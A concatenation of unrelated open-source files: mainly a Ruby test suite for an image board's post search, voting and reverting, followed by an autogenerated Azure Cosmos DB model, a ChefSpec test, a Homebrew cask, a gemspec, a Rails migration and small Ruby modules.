users = FactoryBot.create_list(:user, 2)
posts = users.map do |u|
CurrentUser.scoped(u) { FactoryBot.create(:post, tag_string: "fav:#{u.name}") }
end
assert_tag_match([posts[0]], "fav:#{users[0].name}")
assert_tag_match([posts[1]], "-fav:#{users[0].name}")
end
should "return posts for the ordfav:<name> metatag" do
post1 = FactoryBot.create(:post, tag_string: "fav:#{CurrentUser.name}")
post2 = FactoryBot.create(:post, tag_string: "fav:#{CurrentUser.name}")
assert_tag_match([post2, post1], "ordfav:#{CurrentUser.name}")
end
should "return posts for the pool:<name> metatag" do
SqsService.any_instance.stubs(:send_message)
pool1 = create(:pool, name: "test_a", category: "series")
pool2 = create(:pool, name: "test_b", category: "collection")
post1 = create(:post, tag_string: "pool:test_a")
post2 = create(:post, tag_string: "pool:test_b")
assert_tag_match([post1], "pool:#{pool1.id}")
assert_tag_match([post2], "pool:#{pool2.id}")
assert_tag_match([post1], "pool:TEST_A")
assert_tag_match([post2], "pool:Test_B")
assert_tag_match([post1], "pool:test_a")
assert_tag_match([post2], "-pool:test_a")
assert_tag_match([], "pool:test_a pool:test_b")
assert_tag_match([], "-pool:test_a -pool:test_b")
assert_tag_match([post2, post1], "pool:test*")
assert_tag_match([post2, post1], "pool:any")
assert_tag_match([post2, post1], "-pool:none")
assert_tag_match([], "-pool:any")
assert_tag_match([], "pool:none")
assert_tag_match([post1], "pool:series")
assert_tag_match([post2], "-pool:series")
assert_tag_match([post2], "pool:collection")
assert_tag_match([post1], "-pool:collection")
end
should "return posts for the ordpool:<name> metatag" do
posts = FactoryBot.create_list(:post, 2, tag_string: "newpool:test")
assert_tag_match(posts, "ordpool:test")
end
should "return posts for the ordpool:<name> metatag for a series pool containing duplicate posts" do
posts = FactoryBot.create_list(:post, 2)
pool = FactoryBot.create(:pool, name: "test", category: "series", post_ids: [posts[0].id, posts[1].id, posts[1].id])
assert_tag_match([posts[0], posts[1], posts[1]], "ordpool:test")
end
should "return posts for the parent:<N> metatag" do
parent = FactoryBot.create(:post)
child = FactoryBot.create(:post, tag_string: "parent:#{parent.id}")
assert_tag_match([parent], "parent:none")
assert_tag_match([child], "-parent:none")
assert_tag_match([child, parent], "parent:#{parent.id}")
assert_tag_match([child], "parent:#{child.id}")
assert_tag_match([child], "child:none")
assert_tag_match([parent], "child:any")
end
should "return posts for the favgroup:<name> metatag" do
favgroups = FactoryBot.create_list(:favorite_group, 2, creator: CurrentUser.user)
posts = favgroups.map { |g| FactoryBot.create(:post, tag_string: "favgroup:#{g.name}") }
assert_tag_match([posts[0]], "favgroup:#{favgroups[0].name}")
assert_tag_match([posts[1]], "-favgroup:#{favgroups[0].name}")
assert_tag_match([], "-favgroup:#{favgroups[0].name} -favgroup:#{favgroups[1].name}")
end
should "return posts for the user:<name> metatag" do
users = FactoryBot.create_list(:user, 2)
posts = users.map { |u| FactoryBot.create(:post, uploader: u) }
assert_tag_match([posts[0]], "user:#{users[0].name}")
assert_tag_match([posts[1]], "-user:#{users[0].name}")
end
should "return posts for the approver:<name> metatag" do
users = FactoryBot.create_list(:user, 2)
posts = users.map { |u| FactoryBot.create(:post, approver: u) }
posts << FactoryBot.create(:post, approver: nil)
assert_tag_match([posts[0]], "approver:#{users[0].name}")
assert_tag_match([posts[1]], "-approver:#{users[0].name}")
assert_tag_match([posts[1], posts[0]], "approver:any")
assert_tag_match([posts[2]], "approver:none")
end
should "return posts for the commenter:<name> metatag" do
users = FactoryBot.create_list(:user, 2, created_at: 2.weeks.ago)
posts = FactoryBot.create_list(:post, 2)
comms = users.zip(posts).map { |u, p| as(u) { FactoryBot.create(:comment, creator: u, post: p) } }
assert_tag_match([posts[0]], "commenter:#{users[0].name}")
assert_tag_match([posts[1]], "commenter:#{users[1].name}")
end
should "return posts for the commenter:<any|none> metatag" do
posts = FactoryBot.create_list(:post, 2)
create(:comment, creator: create(:user, created_at: 2.weeks.ago), post: posts[0], is_deleted: false)
create(:comment, creator: create(:user, created_at: 2.weeks.ago), post: posts[1], is_deleted: true)
assert_tag_match([posts[0]], "commenter:any")
assert_tag_match([posts[1]], "commenter:none")
end
should "return posts for the noter:<name> metatag" do
users = FactoryBot.create_list(:user, 2)
posts = FactoryBot.create_list(:post, 2)
notes = users.zip(posts).map { |u, p| FactoryBot.create(:note, creator: u, post: p) }
assert_tag_match([posts[0]], "noter:#{users[0].name}")
assert_tag_match([posts[1]], "noter:#{users[1].name}")
end
should "return posts for the noter:<any|none> metatag" do
posts = FactoryBot.create_list(:post, 2)
FactoryBot.create(:note, post: posts[0], is_active: true)
FactoryBot.create(:note, post: posts[1], is_active: false)
assert_tag_match([posts[0]], "noter:any")
assert_tag_match([posts[1]], "noter:none")
end
should "return posts for the note_count:<N> metatag" do
posts = FactoryBot.create_list(:post, 3)
FactoryBot.create(:note, post: posts[0], is_active: true)
FactoryBot.create(:note, post: posts[1], is_active: false)
assert_tag_match([posts[1], posts[0]], "note_count:1")
assert_tag_match([posts[0]], "active_note_count:1")
assert_tag_match([posts[1]], "deleted_note_count:1")
assert_tag_match([posts[1], posts[0]], "notes:1")
assert_tag_match([posts[0]], "active_notes:1")
assert_tag_match([posts[1]], "deleted_notes:1")
end
should "return posts for the artcomm:<name> metatag" do
users = FactoryBot.create_list(:user, 2)
posts = FactoryBot.create_list(:post, 2)
users.zip(posts).map do |u, p|
CurrentUser.scoped(u) { FactoryBot.create(:artist_commentary, post: p) }
end
assert_tag_match([posts[0]], "artcomm:#{users[0].name}")
assert_tag_match([posts[1]], "artcomm:#{users[1].name}")
end
should "return posts for the date:<d> metatag" do
post = FactoryBot.create(:post, created_at: Time.parse("2017-01-01 12:00"))
assert_tag_match([post], "date:2017-01-01")
end
should "return posts for the age:<n> metatag" do
post = FactoryBot.create(:post)
assert_tag_match([post], "age:<60")
assert_tag_match([post], "age:<60s")
assert_tag_match([post], "age:<1mi")
assert_tag_match([post], "age:<1h")
assert_tag_match([post], "age:<1d")
assert_tag_match([post], "age:<1w")
assert_tag_match([post], "age:<1mo")
assert_tag_match([post], "age:<1y")
end
should "return posts for the ratio:<x:y> metatag" do
post = FactoryBot.create(:post, image_width: 1000, image_height: 500)
assert_tag_match([post], "ratio:2:1")
assert_tag_match([post], "ratio:2.0")
end
should "return posts for the status:<type> metatag" do
pending = FactoryBot.create(:post, is_pending: true)
flagged = FactoryBot.create(:post, is_flagged: true)
deleted = FactoryBot.create(:post, is_deleted: true)
banned = FactoryBot.create(:post, is_banned: true)
all = [banned, deleted, flagged, pending]
assert_tag_match([flagged, pending], "status:modqueue")
assert_tag_match([pending], "status:pending")
assert_tag_match([flagged], "status:flagged")
assert_tag_match([deleted], "status:deleted")
assert_tag_match([banned], "status:banned")
assert_tag_match([], "status:active")
assert_tag_match(all, "status:any")
assert_tag_match(all, "status:all")
assert_tag_match(all - [flagged, pending], "-status:modqueue")
assert_tag_match(all - [pending], "-status:pending")
assert_tag_match(all - [flagged], "-status:flagged")
assert_tag_match(all - [deleted], "-status:deleted")
assert_tag_match(all - [banned], "-status:banned")
assert_tag_match(all, "-status:active")
end
should "return posts for the status:unmoderated metatag" do
flagged = FactoryBot.create(:post, is_flagged: true)
pending = FactoryBot.create(:post, is_pending: true)
disapproved = FactoryBot.create(:post, is_pending: true)
create(:post_flag, post: flagged, creator: create(:user, created_at: 2.weeks.ago))
FactoryBot.create(:post_disapproval, post: disapproved, reason: "disinterest")
assert_tag_match([pending, flagged], "status:unmoderated")
end
should "respect the 'Deleted post filter' option when using the status:banned metatag" do
deleted = FactoryBot.create(:post, is_deleted: true, is_banned: true)
undeleted = FactoryBot.create(:post, is_banned: true)
CurrentUser.hide_deleted_posts = true
assert_tag_match([undeleted], "status:banned")
CurrentUser.hide_deleted_posts = false
assert_tag_match([undeleted, deleted], "status:banned")
end
should "return posts for the filetype:<ext> metatag" do
png = FactoryBot.create(:post, file_ext: "png")
jpg = FactoryBot.create(:post, file_ext: "jpg")
assert_tag_match([png], "filetype:png")
assert_tag_match([jpg], "-filetype:png")
end
should "return posts for the tagcount:<n> metatags" do
post = FactoryBot.create(:post, tag_string: "artist:wokada copyright:vocaloid char:hatsune_miku twintails")
assert_tag_match([post], "tagcount:4")
assert_tag_match([post], "arttags:1")
assert_tag_match([post], "copytags:1")
assert_tag_match([post], "chartags:1")
assert_tag_match([post], "gentags:1")
end
should "return posts for the md5:<md5> metatag" do
post1 = FactoryBot.create(:post, :md5 => "abcd")
post2 = FactoryBot.create(:post)
assert_tag_match([post1], "md5:abcd")
end
should "return posts for a source search" do
post1 = FactoryBot.create(:post, :source => "abcd")
post2 = FactoryBot.create(:post, :source => "abcdefg")
post3 = FactoryBot.create(:post, :source => "")
assert_tag_match([post2], "source:abcde")
assert_tag_match([post3, post1], "-source:abcde")
assert_tag_match([post3], "source:none")
assert_tag_match([post2, post1], "-source:none")
end
should "return posts for a case insensitive source search" do
post1 = FactoryBot.create(:post, :source => "ABCD")
post2 = FactoryBot.create(:post, :source => "1234")
assert_tag_match([post1], "source:abcd")
end
should "return posts for a pixiv source search" do
url = "http://i1.pixiv.net/img123/img/artist-name/789.png"
post = FactoryBot.create(:post, :source => url)
assert_tag_match([post], "source:*.pixiv.net/img*/artist-name/*")
assert_tag_match([], "source:*.pixiv.net/img*/artist-fake/*")
assert_tag_match([post], "source:http://*.pixiv.net/img*/img/artist-name/*")
assert_tag_match([], "source:http://*.pixiv.net/img*/img/artist-fake/*")
end
should "return posts for a pixiv id search (type 1)" do
url = "http://i1.pixiv.net/img-inf/img/2013/03/14/03/02/36/34228050_s.jpg"
post = FactoryBot.create(:post, :source => url)
assert_tag_match([post], "pixiv_id:34228050")
end
should "return posts for a pixiv id search (type 2)" do
url = "http://i1.pixiv.net/img123/img/artist-name/789.png"
post = FactoryBot.create(:post, :source => url)
assert_tag_match([post], "pixiv_id:789")
end
should "return posts for a pixiv id search (type 3)" do
url = "http://www.pixiv.net/member_illust.php?mode=manga_big&illust_id=19113635&page=0"
post = FactoryBot.create(:post, :source => url)
assert_tag_match([post], "pixiv_id:19113635")
end
should "return posts for a pixiv id search (type 4)" do
url = "http://i2.pixiv.net/img70/img/disappearedstump/34551381_p3.jpg?1364424318"
post = FactoryBot.create(:post, :source => url)
assert_tag_match([post], "pixiv_id:34551381")
end
should "return posts for a pixiv_id:any search" do
url = "http://i1.pixiv.net/img-original/img/2014/10/02/13/51/23/46304396_p0.png"
post = FactoryBot.create(:post, source: url)
assert_tag_match([post], "pixiv_id:any")
end
should "return posts for a pixiv_id:none search" do
post = FactoryBot.create(:post)
assert_tag_match([post], "pixiv_id:none")
end
context "saved searches" do
setup do
@post1 = FactoryBot.create(:post, tag_string: "aaa")
@post2 = FactoryBot.create(:post, tag_string: "bbb")
FactoryBot.create(:saved_search, query: "aaa", labels: ["zzz"], user: CurrentUser.user)
FactoryBot.create(:saved_search, query: "bbb", user: CurrentUser.user)
end
context "labeled" do
should "work" do
SavedSearch.expects(:post_ids_for).with(CurrentUser.id, label: "zzz").returns([@post1.id])
assert_tag_match([@post1], "search:zzz")
end
end
context "missing" do
should "work" do
SavedSearch.expects(:post_ids_for).with(CurrentUser.id, label: "uncategorized").returns([@post2.id])
assert_tag_match([@post2], "search:uncategorized")
end
end
context "all" do
should "work" do
SavedSearch.expects(:post_ids_for).with(CurrentUser.id).returns([@post1.id, @post2.id])
assert_tag_match([@post2, @post1], "search:all")
end
end
end
should "return posts for a rating:<s|q|e> metatag" do
s = FactoryBot.create(:post, :rating => "s")
q = FactoryBot.create(:post, :rating => "q")
e = FactoryBot.create(:post, :rating => "e")
all = [e, q, s]
assert_tag_match([s], "rating:s")
assert_tag_match([q], "rating:q")
assert_tag_match([e], "rating:e")
assert_tag_match(all - [s], "-rating:s")
assert_tag_match(all - [q], "-rating:q")
assert_tag_match(all - [e], "-rating:e")
end
should "return posts for a locked:<rating|note|status> metatag" do
rating_locked = FactoryBot.create(:post, is_rating_locked: true)
note_locked = FactoryBot.create(:post, is_note_locked: true)
status_locked = FactoryBot.create(:post, is_status_locked: true)
all = [status_locked, note_locked, rating_locked]
assert_tag_match([rating_locked], "locked:rating")
assert_tag_match([note_locked], "locked:note")
assert_tag_match([status_locked], "locked:status")
assert_tag_match(all - [rating_locked], "-locked:rating")
assert_tag_match(all - [note_locked], "-locked:note")
assert_tag_match(all - [status_locked], "-locked:status")
end
should "return posts for a upvote:<user>, downvote:<user> metatag" do
CurrentUser.scoped(FactoryBot.create(:mod_user)) do
upvoted = FactoryBot.create(:post, tag_string: "upvote:self")
downvoted = FactoryBot.create(:post, tag_string: "downvote:self")
assert_tag_match([upvoted], "upvote:#{CurrentUser.name}")
assert_tag_match([downvoted], "downvote:#{CurrentUser.name}")
end
end
should "return posts for a disapproval:<type> metatag" do
CurrentUser.scoped(FactoryBot.create(:mod_user)) do
pending = FactoryBot.create(:post, is_pending: true)
disapproved = FactoryBot.create(:post, is_pending: true)
disapproval = FactoryBot.create(:post_disapproval, post: disapproved, reason: "disinterest")
assert_tag_match([pending], "disapproval:none")
assert_tag_match([disapproved], "disapproval:any")
assert_tag_match([disapproved], "disapproval:disinterest")
assert_tag_match([], "disapproval:breaks_rules")
assert_tag_match([disapproved], "-disapproval:none")
assert_tag_match([pending], "-disapproval:any")
assert_tag_match([pending], "-disapproval:disinterest")
assert_tag_match([disapproved, pending], "-disapproval:breaks_rules")
end
end
should "return posts ordered by a particular attribute" do
posts = (1..2).map do |n|
tags = ["tagme", "gentag1 gentag2 artist:arttag char:chartag copy:copytag"]
p = FactoryBot.create(
:post,
score: n,
fav_count: n,
file_size: 1.megabyte * n,
# posts[0] is portrait, posts[1] is landscape. posts[1].mpixels > posts[0].mpixels.
image_height: 100 * n * n,
image_width: 100 * (3 - n) * n,
tag_string: tags[n - 1]
)
u = create(:user, created_at: 2.weeks.ago)
create(:artist_commentary, post: p)
create(:comment, post: p, creator: u, do_not_bump_post: false)
create(:note, post: p, creator: u)
p
end
FactoryBot.create(:note, post: posts.second)
assert_tag_match(posts.reverse, "order:id_desc")
assert_tag_match(posts.reverse, "order:score")
assert_tag_match(posts.reverse, "order:favcount")
assert_tag_match(posts.reverse, "order:change")
assert_tag_match(posts.reverse, "order:comment")
assert_tag_match(posts.reverse, "order:comment_bumped")
assert_tag_match(posts.reverse, "order:note")
assert_tag_match(posts.reverse, "order:artcomm")
assert_tag_match(posts.reverse, "order:mpixels")
assert_tag_match(posts.reverse, "order:portrait")
assert_tag_match(posts.reverse, "order:filesize")
assert_tag_match(posts.reverse, "order:tagcount")
assert_tag_match(posts.reverse, "order:gentags")
assert_tag_match(posts.reverse, "order:arttags")
assert_tag_match(posts.reverse, "order:chartags")
assert_tag_match(posts.reverse, "order:copytags")
assert_tag_match(posts.reverse, "order:rank")
assert_tag_match(posts.reverse, "order:note_count")
assert_tag_match(posts.reverse, "order:note_count_desc")
assert_tag_match(posts.reverse, "order:notes")
assert_tag_match(posts.reverse, "order:notes_desc")
assert_tag_match(posts, "order:id_asc")
assert_tag_match(posts, "order:score_asc")
assert_tag_match(posts, "order:favcount_asc")
assert_tag_match(posts, "order:change_asc")
assert_tag_match(posts, "order:comment_asc")
assert_tag_match(posts, "order:comment_bumped_asc")
assert_tag_match(posts, "order:artcomm_asc")
assert_tag_match(posts, "order:note_asc")
assert_tag_match(posts, "order:mpixels_asc")
assert_tag_match(posts, "order:landscape")
assert_tag_match(posts, "order:filesize_asc")
assert_tag_match(posts, "order:tagcount_asc")
assert_tag_match(posts, "order:gentags_asc")
assert_tag_match(posts, "order:arttags_asc")
assert_tag_match(posts, "order:chartags_asc")
assert_tag_match(posts, "order:copytags_asc")
assert_tag_match(posts, "order:note_count_asc")
assert_tag_match(posts, "order:notes_asc")
end
should "return posts for order:comment_bumped" do
post1 = FactoryBot.create(:post)
post2 = FactoryBot.create(:post)
post3 = FactoryBot.create(:post)
user = create(:gold_user)
as(user) do
comment1 = create(:comment, creator: user, post: post1)
comment2 = create(:comment, creator: user, post: post2, do_not_bump_post: true)
comment3 = create(:comment, creator: user, post: post3)
end
assert_tag_match([post3, post1, post2], "order:comment_bumped")
assert_tag_match([post2, post1, post3], "order:comment_bumped_asc")
end
should "return posts for a filesize search" do
post = FactoryBot.create(:post, :file_size => 1.megabyte)
assert_tag_match([post], "filesize:1mb")
assert_tag_match([post], "filesize:1000kb")
assert_tag_match([post], "filesize:1048576b")
end
should "not perform fuzzy matching for an exact filesize search" do
post = FactoryBot.create(:post, :file_size => 1.megabyte)
assert_tag_match([], "filesize:1048000b")
assert_tag_match([], "filesize:1048000")
end
should "resolve aliases to the actual tag" do
create(:tag_alias, antecedent_name: "kitten", consequent_name: "cat")
post1 = create(:post, tag_string: "cat")
post2 = create(:post, tag_string: "dog")
assert_tag_match([post1], "kitten")
assert_tag_match([post2], "-kitten")
end
should "fail for more than 6 tags" do
post1 = FactoryBot.create(:post, :rating => "s")
assert_raise(::Post::SearchError) do
Post.tag_match("a b c rating:s width:10 height:10 user:bob")
end
end
should "not count free tags against the user's search limit" do
post1 = FactoryBot.create(:post, tag_string: "aaa bbb rating:s")
Danbooru.config.expects(:is_unlimited_tag?).with("rating:s").once.returns(true)
Danbooru.config.expects(:is_unlimited_tag?).with(anything).twice.returns(false)
assert_tag_match([post1], "aaa bbb rating:s")
end
should "succeed for exclusive tag searches with no other tag" do
post1 = FactoryBot.create(:post, :rating => "s", :tag_string => "aaa")
assert_nothing_raised do
relation = Post.tag_match("-aaa")
end
end
should "succeed for exclusive tag searches combined with a metatag" do
post1 = FactoryBot.create(:post, :rating => "s", :tag_string => "aaa")
assert_nothing_raised do
relation = Post.tag_match("-aaa id:>0")
end
end
end
context "Voting:" do
context "with a super voter" do
setup do
@user = FactoryBot.create(:user)
FactoryBot.create(:super_voter, user: @user)
@post = FactoryBot.create(:post)
end
should "account for magnitude" do
CurrentUser.scoped(@user, "127.0.0.1") do
assert_nothing_raised {@post.vote!("up")}
assert_raises(PostVote::Error) {@post.vote!("up")}
@post.reload
assert_equal(1, PostVote.count)
assert_equal(SuperVoter::MAGNITUDE, @post.score)
end
end
end
should "not allow members to vote" do
@user = FactoryBot.create(:user)
@post = FactoryBot.create(:post)
as_user do
assert_raises(PostVote::Error) { @post.vote!("up") }
end
end
should "not allow duplicate votes" do
user = FactoryBot.create(:gold_user)
post = FactoryBot.create(:post)
CurrentUser.scoped(user, "127.0.0.1") do
assert_nothing_raised {post.vote!("up")}
assert_raises(PostVote::Error) {post.vote!("up")}
post.reload
assert_equal(1, PostVote.count)
assert_equal(1, post.score)
end
end
should "allow undoing of votes" do
user = FactoryBot.create(:gold_user)
post = FactoryBot.create(:post)
# We deliberately don't call post.reload until the end to verify that
# post.unvote! returns the correct score even when not forcibly reloaded.
CurrentUser.scoped(user, "127.0.0.1") do
post.vote!("up")
assert_equal(1, post.score)
post.unvote!
assert_equal(0, post.score)
assert_nothing_raised {post.vote!("down")}
assert_equal(-1, post.score)
post.unvote!
assert_equal(0, post.score)
assert_nothing_raised {post.vote!("up")}
assert_equal(1, post.score)
post.reload
assert_equal(1, post.score)
end
end
end
context "Counting:" do
context "Creating a post" do
setup do
Danbooru.config.stubs(:blank_tag_search_fast_count).returns(nil)
Danbooru.config.stubs(:estimate_post_counts).returns(false)
FactoryBot.create(:tag_alias, :antecedent_name => "alias", :consequent_name => "aaa")
FactoryBot.create(:post, :tag_string => "aaa", "score" => 42)
end
context "a single basic tag" do
should "return the cached count" do
Tag.find_or_create_by_name("aaa").update_columns(post_count: 100)
assert_equal(100, Post.fast_count("aaa"))
end
end
context "an aliased tag" do
should "return the count of the consequent tag" do
assert_equal(Post.fast_count("aaa"), Post.fast_count("alias"))
end
end
context "a single metatag" do
should "return the correct cached count" do
FactoryBot.build(:tag, name: "score:42", post_count: -100).save(validate: false)
Post.set_count_in_cache("score:42", 100)
assert_equal(100, Post.fast_count("score:42"))
end
should "return the correct cached count for a pool:<id> search" do
FactoryBot.build(:tag, name: "pool:1234", post_count: -100).save(validate: false)
Post.set_count_in_cache("pool:1234", 100)
assert_equal(100, Post.fast_count("pool:1234"))
end
end
context "a multi-tag search" do
should "return the cached count, if it exists" do
Post.set_count_in_cache("aaa score:42", 100)
assert_equal(100, Post.fast_count("aaa score:42"))
end
should "return the true count, if not cached" do
assert_equal(1, Post.fast_count("aaa score:42"))
end
should "set the expiration time" do
Cache.expects(:put).with(Post.count_cache_key("aaa score:42"), 1, 180)
Post.fast_count("aaa score:42")
end
end
context "a blank search" do
should "should execute a search" do
Cache.delete(Post.count_cache_key(''))
Post.expects(:fast_count_search).with("", kind_of(Hash)).once.returns(1)
assert_equal(1, Post.fast_count(""))
end
should "set the value in cache" do
Post.expects(:set_count_in_cache).with("", kind_of(Integer)).once
Post.fast_count("")
end
context "with a primed cache" do
setup do
Cache.put(Post.count_cache_key(''), "100")
end
should "fetch the value from the cache" do
assert_equal(100, Post.fast_count(""))
end
end
should_eventually "translate an alias" do
assert_equal(1, Post.fast_count("alias"))
end
should "return 0 for a nonexisting tag" do
assert_equal(0, Post.fast_count("bbb"))
end
context "in safe mode" do
setup do
CurrentUser.stubs(:safe_mode?).returns(true)
FactoryBot.create(:post, "rating" => "s")
end
should "work for a blank search" do
assert_equal(1, Post.fast_count(""))
end
should "work for a nil search" do
assert_equal(1, Post.fast_count(nil))
end
should "not fail for a two tag search by a member" do
post1 = FactoryBot.create(:post, tag_string: "aaa bbb rating:s")
post2 = FactoryBot.create(:post, tag_string: "aaa bbb rating:e")
Danbooru.config.expects(:is_unlimited_tag?).with("rating:s").once.returns(true)
Danbooru.config.expects(:is_unlimited_tag?).with(anything).twice.returns(false)
assert_equal(1, Post.fast_count("aaa bbb"))
end
should "set the value in cache" do
Post.expects(:set_count_in_cache).with("rating:s", kind_of(Integer)).once
Post.fast_count("")
end
context "with a primed cache" do
setup do
Cache.put(Post.count_cache_key('rating:s'), "100")
end
should "fetch the value from the cache" do
assert_equal(100, Post.fast_count(""))
end
end
end
end
end
end
context "Reverting: " do
context "a post that is rating locked" do
setup do
@post = FactoryBot.create(:post, :rating => "s")
travel(2.hours) do
@post.update(rating: "q", is_rating_locked: true)
end
end
should "not revert the rating" do
assert_raises ActiveRecord::RecordInvalid do
@post.revert_to!(@post.versions.first)
end
assert_equal(["Rating is locked and cannot be changed. Unlock the post first."], @post.errors.full_messages)
assert_equal(@post.versions.last.rating, @post.reload.rating)
end
should "revert the rating after unlocking" do
@post.update(rating: "e", is_rating_locked: false)
assert_nothing_raised do
@post.revert_to!(@post.versions.first)
end
assert(@post.valid?)
assert_equal(@post.versions.first.rating, @post.rating)
end
end
context "a post that has been updated" do
setup do
PostArchive.sqs_service.stubs(:merge?).returns(false)
@post = FactoryBot.create(:post, :rating => "q", :tag_string => "aaa", :source => "")
@post.reload
@post.update(:tag_string => "aaa bbb ccc ddd")
@post.reload
@post.update(:tag_string => "bbb xxx yyy", :source => "xyz")
@post.reload
@post.update(:tag_string => "bbb mmm yyy", :source => "abc")
@post.reload
end
context "and then reverted to an early version" do
setup do
@post.revert_to(@post.versions[1])
end
should "correctly revert all fields" do
assert_equal("aaa bbb ccc ddd", @post.tag_string)
assert_equal("", @post.source)
assert_equal("q", @post.rating)
end
end
context "and then reverted to a later version" do
setup do
@post.revert_to(@post.versions[-2])
end
should "correctly revert all fields" do
assert_equal("bbb xxx yyy", @post.tag_string)
assert_equal("xyz", @post.source)
assert_equal("q", @post.rating)
end
end
end
end
context "URLs:" do
should "generate the correct urls for animated gifs" do
@post = FactoryBot.build(:post, md5: "deadbeef", file_ext: "gif", tag_string: "animated_gif")
assert_equal("https://localhost/data/preview/deadbeef.jpg", @post.preview_file_url)
assert_equal("https://localhost/data/deadbeef.gif", @post.large_file_url)
assert_equal("https://localhost/data/deadbeef.gif", @post.file_url)
end
end
context "Notes:" do
context "#copy_notes_to" do
setup do
@src = FactoryBot.create(:post, image_width: 100, image_height: 100, tag_string: "translated partially_translated", has_embedded_notes: true)
@dst = FactoryBot.create(:post, image_width: 200, image_height: 200, tag_string: "translation_request")
create(:note, post: @src, x: 10, y: 10, width: 10, height: 10, body: "test")
create(:note, post: @src, x: 10, y: 10, width: 10, height: 10, body: "deleted", is_active: false)
@src.reload.copy_notes_to(@dst)
end
should "copy notes and tags" do
assert_equal(1, @dst.notes.active.length)
assert_equal(true, @dst.has_embedded_notes)
assert_equal("lowres partially_translated translated", @dst.tag_string)
end
should "rescale notes" do
note = @dst.notes.active.first
assert_equal([20, 20, 20, 20], [note.x, note.y, note.width, note.height])
end
end
end
context "#replace!" do
subject { @post.replace!(tags: "something", replacement_url: "https://danbooru.donmai.us/images/download-preview.png") }
setup do
@post = FactoryBot.create(:post)
@post.stubs(:queue_delete_files)
end
should "update the post" do
assert_changes(-> { @post.md5 }) do
subject
end
end
end
end
| 35.860065 | 149 | 0.607662 |
d5a5bb9038a55e5cb7052c6c9435c335036373fc | 3,268 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Cosmosdb::Mgmt::V2020_04_01
module Models
#
# An Azure Cosmos DB MongoDB collection.
#
class MongoDBCollectionGetResults < ARMResourceProperties
include MsRestAzure
# @return [MongoDBCollectionGetPropertiesResource]
attr_accessor :resource
# @return [MongoDBCollectionGetPropertiesOptions]
attr_accessor :options
#
# Mapper for MongoDBCollectionGetResults class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'MongoDBCollectionGetResults',
type: {
name: 'Composite',
class_name: 'MongoDBCollectionGetResults',
model_properties: {
id: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'id',
type: {
name: 'String'
}
},
name: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'name',
type: {
name: 'String'
}
},
type: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'type',
type: {
name: 'String'
}
},
location: {
client_side_validation: true,
required: false,
serialized_name: 'location',
type: {
name: 'String'
}
},
tags: {
client_side_validation: true,
required: false,
serialized_name: 'tags',
type: {
name: 'Dictionary',
value: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
},
resource: {
client_side_validation: true,
required: false,
serialized_name: 'properties.resource',
type: {
name: 'Composite',
class_name: 'MongoDBCollectionGetPropertiesResource'
}
},
options: {
client_side_validation: true,
required: false,
serialized_name: 'properties.options',
type: {
name: 'Composite',
class_name: 'MongoDBCollectionGetPropertiesOptions'
}
}
}
}
}
end
end
end
end
| 29.441441 | 70 | 0.452264 |
219291715ab0fadd4d72394eaa3aa2eea60ba52f | 754 | require 'spec_helper'
describe 'cafe-core::common' do
let(:chef_run) { ChefSpec::ServerRunner.new.converge(described_recipe) }
it 'marks the common recipe as active' do
expect(chef_run.node['cafe']['core']['common']['active']).to be true
end
cookbooks = %w(ntp zsh vim)
cookbooks.each do |cookbook|
it "includes the #{cookbook}::default recipe" do
expect(chef_run).to include_recipe("#{cookbook}::default")
end
end
context 'when platform is ubuntu' do
let(:chef_run) do
ChefSpec::ServerRunner.new(
platform: 'ubuntu', version: '14.04'
).converge(described_recipe)
end
it 'includes the apt::default recipe' do
expect(chef_run).to include_recipe('apt::default')
end
end
end
| 25.133333 | 74 | 0.672414 |
4a84e8dfa9a41ed5a5393f5e8a0ea83f8a9f817b | 608 | cask 'barxtemp' do
version '1.3.2'
sha256 '85c8347ab8e7cbc8e7cf639317f3ff5df75feb9420bf94596dcfa05ac5914d16'
# github.com/Gabriele91/barXtemp was verified as official when first introduced to the cask
url "https://github.com/Gabriele91/barXtemp/releases/download/#{version}/barXtemp.app.zip"
appcast 'https://github.com/Gabriele91/barXtemp/releases.atom',
checkpoint: '9b7756a504b6ce274e2efde312990f95bb831589f9bf6a21cb1ccfe5a7f55c86'
name 'barXtemp'
homepage 'https://gabriele91.github.io/barXtemp/'
license :mit
depends_on macos: '>= :mountain_lion'
app 'barXtemp.app'
end
| 35.764706 | 93 | 0.777961 |
26a107b6404784d24b7e648f844af2f7f8e810e5 | 824 | # -*- encoding: utf-8 -*-
require File.expand_path('../lib/angular_material/rails/version', __FILE__)
Gem::Specification.new do |s|
s.name = "angular-material-rails"
s.version = AngularMaterial::Rails::VERSION
s.platform = Gem::Platform::RUBY
s.authors = ["Alex Vangelov"]
s.email = ["[email protected]"]
s.homepage = "http://rubygems.org/gems/angular-material-rails"
s.summary = "Using Angular Material with Rails"
s.description = "This gem adds Angular Material to Rails assets pipeline"
s.licenses = ["AV","MIT"]
#s.required_rubygems_version = ">= 1.3.6"
s.files = `git ls-files`.split("\n")
s.extensions = 'ext/mkrf_conf.rb'
s.require_path = 'lib'
s.add_dependency "sprockets", ">3.0.0"
s.add_dependency "rubyzip"
#s.add_dependency "thor"
end | 34.333333 | 75 | 0.651699 |
08fe17e700ea98f9af2dc10379d976514c458d52 | 416 | # frozen_string_literal: true
class CreateServiceAtLocations < ActiveRecord::Migration[5.2]
def change
create_table :service_at_locations, id: :uuid do |t|
t.references :service, foreign_key: true, type: :uuid
t.references :location, foreign_key: true, type: :uuid
t.references :link_instance, foreign_key: true, type: :uuid
t.string :description
t.timestamps
end
end
end
| 27.733333 | 65 | 0.709135 |
18e5610dca8bcae4ca05c9ed74714d00dae6336e | 88 | module WebConsole
module REPL
class Pry
VERSION = "0.2.1"
end
end
end
| 11 | 23 | 0.602273 |
6a6b705bc2959be06f0f6cf0d6de43afe22233c3 | 357 | require 'ostruct'
require 'representable/json'
require 'viagogo/resource'
module Viagogo
class Geography < OpenStruct
end
module GeographyRepresenter
include Representable::JSON
property :id, as: :Id
property :name, as: :Name
property :country, as: :Country, extend: Viagogo::ResourceRepresenter, class: Viagogo::Resource
end
end
